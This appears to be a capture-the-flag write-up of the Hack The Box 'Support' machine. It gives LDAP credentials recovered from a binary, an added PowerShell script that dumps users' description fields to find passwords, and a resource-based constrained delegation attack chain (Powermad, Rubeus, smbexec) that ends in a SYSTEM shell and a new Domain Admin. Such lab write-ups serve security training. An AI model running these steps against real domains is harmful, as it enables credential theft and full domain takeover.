Support
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
Port 53 - DNS
CMD: dig any @10.10.11.174 support.htb
Port 445 - File Sharing SMB
CMD: smbclient -L //10.10.11.174/
Initial Foothold
Directory of support-tools:
UserInfo.exe
Ran UserInfo.exe under wine with Wireshark capturing its traffic and recovered the username/password it uses for LDAP lookups.
Used that credential with ldapsearch and ldapdomaindump and discovered a second username/password:
CMD: ldapsearch -x -H ldap://dc.support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=support,CN=Users,DC=support,DC=htb"
Username: support
Pass: Ironside47pleasure40Watchful
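The ldapsearch above binds with the recovered ldap account and reads one object. The block below is an added example, not a command from the original writeup: it performs the same authenticated bind from a Windows host with System.DirectoryServices and goes a step beyond the page by listing the free-text attributes (description, info, comment) of every user object, which is where a credential left behind by an administrator tends to surface. The server name, base DN and attribute list are assumptions; the bind credential is the one the page recovered.

```powershell
# Added example (not the original page's commands). Assumes a Windows host that can
# reach dc.support.htb on 389 and the LDAP bind credential recovered from UserInfo.exe.
$Server   = 'dc.support.htb'                           # assumed DC hostname
$BaseDN   = 'DC=support,DC=htb'                        # assumed domain naming context
$BindUser = 'support\ldap'
$BindPass = 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

# Simple bind as the service account found in UserInfo.exe's traffic
$root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server/$BaseDN", $BindUser, $BindPass)
$searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
$searcher.Filter   = '(&(objectCategory=person)(objectClass=user))'
$searcher.PageSize = 500                               # paged results, so large domains are not truncated

# Free-text attributes where admins park notes (and, sometimes, passwords)
$textAttrs = 'description', 'info', 'comment'
foreach ($a in @('sAMAccountName', 'memberOf') + $textAttrs) {
    [void]$searcher.PropertiesToLoad.Add($a)
}

# Print one line per populated free-text attribute, per user, for manual review
foreach ($result in $searcher.FindAll()) {
    $props = $result.Properties                        # keys are lower-cased by .NET
    $sam   = $props['samaccountname'][0]
    foreach ($a in $textAttrs) {
        if ($props[$a].Count -gt 0) {
            $values = $props[$a] | ForEach-Object {
                if ($_ -is [byte[]]) { [Text.Encoding]::UTF8.GetString($_) } else { [string]$_ }
            }
            '{0,-20} {1,-12} {2}' -f $sam, $a, ($values -join ' | ')
        }
    }
}
```

Any line whose value looks like a password is then confirmed the way the page did, by binding as that user with ldapsearch or by a WinRM/SMB login, rather than by assuming the note is current.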
User.txt Proof Screenshot
Privilege Escalation
Used SharpHound/BloodHound and found that the support user has GenericAll permissions on dc.support.htb.
support is a member of the Shared Support Accounts group, which holds that right:
Imported Powermad.ps1, created a new machine account, and configured the DC to allow resource-based constrained delegation (RBCD) from that account:
- Import-Module ./Powermad.ps1
- Set-Variable -Name "Pentest" -Value "Pentest01"
- Set-Variable -Name "targetComputer" -Value "DC"
- Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "Pentest").Value + '$')
- Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount
Powermad: https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
Calculated the new machine account's password hashes with Rubeus:
Rubeus: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe
Created a ccache file from the Kerberos ticket for Administrator. Used smbexec to get an interactive shell as NT AUTHORITY\SYSTEM:
Not able to move around:
Created a new user wild.coyote and added it to the Domain Admins group:
Logged in as wild.coyote with admin rights.
Root Screenshot Here: